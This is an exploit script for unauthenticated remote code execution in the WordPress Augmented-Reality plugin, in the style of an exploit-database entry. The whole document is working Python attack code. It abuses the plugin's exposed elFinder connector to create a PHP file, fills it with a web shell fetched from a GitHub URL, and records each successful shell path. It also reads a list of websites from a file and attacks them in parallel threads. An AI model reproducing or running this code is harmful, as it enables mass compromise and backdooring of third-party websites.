Wordpress Augmented-Reality - Remote Code Execution Unauthenticated

1. # Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated
2. # Date: 2023-09-20
3. # Author: Milad Karimi (Ex3ptionaL)
4. # Category : webapps
5. # Tested on: windows 10 , firefox
6.  
7. import requests as req
8. import json
9. import sys
10. import random
11. import uuid
12. import urllib.parse
13. import urllib3
14. from multiprocessing.dummy import Pool as ThreadPool
15. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
16. filename="{}.php".format(str(uuid.uuid4())[:8])
17. proxies = {}
18. #proxies = {
19. #  'http': 'http://127.0.0.1:8080',
20. #  'https': 'http://127.0.0.1:8080',
21. #}
22. phash = "l1_Lw"
23. r=req.Session()
24. user_agent={
25. "User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
26. }
27. r.headers.update(user_agent)
28. def is_json(myjson):
29.   try:
30.     json_object = json.loads(myjson)
31.   except ValueError as e:
32.     return False
33.   return True
34. def mkfile(target):
35.     data={"cmd" : "mkfile", "target":phash, "name":filename}
36.     resp=r.post(target, data=data)
37.     respon = resp.text
38.     if resp.status_code == 200 and is_json(respon):
39.         resp_json=respon.replace(r"\/", "").replace("\\", "")
40.         resp_json=json.loads(resp_json)
41.         return resp_json["added"][0]["hash"]
42.     else:
43.         return False
44. def put(target, hash):
45.     content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False)
46.     content=content.text
47.     data={"cmd" : "put", "target":hash, "content": content}
48.     respon=r.post(target, data=data, proxies=proxies, verify=False)
49.     if respon.status_code == 200:
50.       return True
51. def exploit(target):
52.     try:
53.         vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target)
54.         respon=r.get(vuln_path, proxies=proxies, verify=False).status_code
55.         if respon != 200:
56.           print("[FAIL] {}".format(target))
57.           return
58.         hash=mkfile(vuln_path)
59.         if hash == False:
60.           print("[FAIL] {}".format(target))
61.           return
62.         if put(vuln_path, hash):
63.           shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename)
64.           status = r.get(shell_path, proxies=proxies, verify=False).status_code
65.           if status==200 :
66.               with open("result.txt", "a") as newline:
67.                   newline.write("{}\n".format(shell_path))
68.                   newline.close()
69.               print("[OK] {}".format(shell_path))
70.               return
71.           else:
72.               print("[FAIL] {}".format(target))
73.               return
74.         else:
75.           print("[FAIL] {}".format(target))
76.           return
77.     except req.exceptions.SSLError:
78.           print("[FAIL] {}".format(target))
79.           return
80.     except req.exceptions.ConnectionError:
81.           print("[FAIL] {}".format(target))
82.           return
83. def main():
84.     threads = input("[?] Threads > ")
85.     list_file = input("[?] List websites file > ")
86.     print("[!] all result saved in result.txt")
87.     with open(list_file, "r") as file:
88.         lines = [line.rstrip() for line in file]
89.         th = ThreadPool(int(threads))
90.         th.map(exploit, lines)
91. if __name__ == "__main__":
92.     main()
93.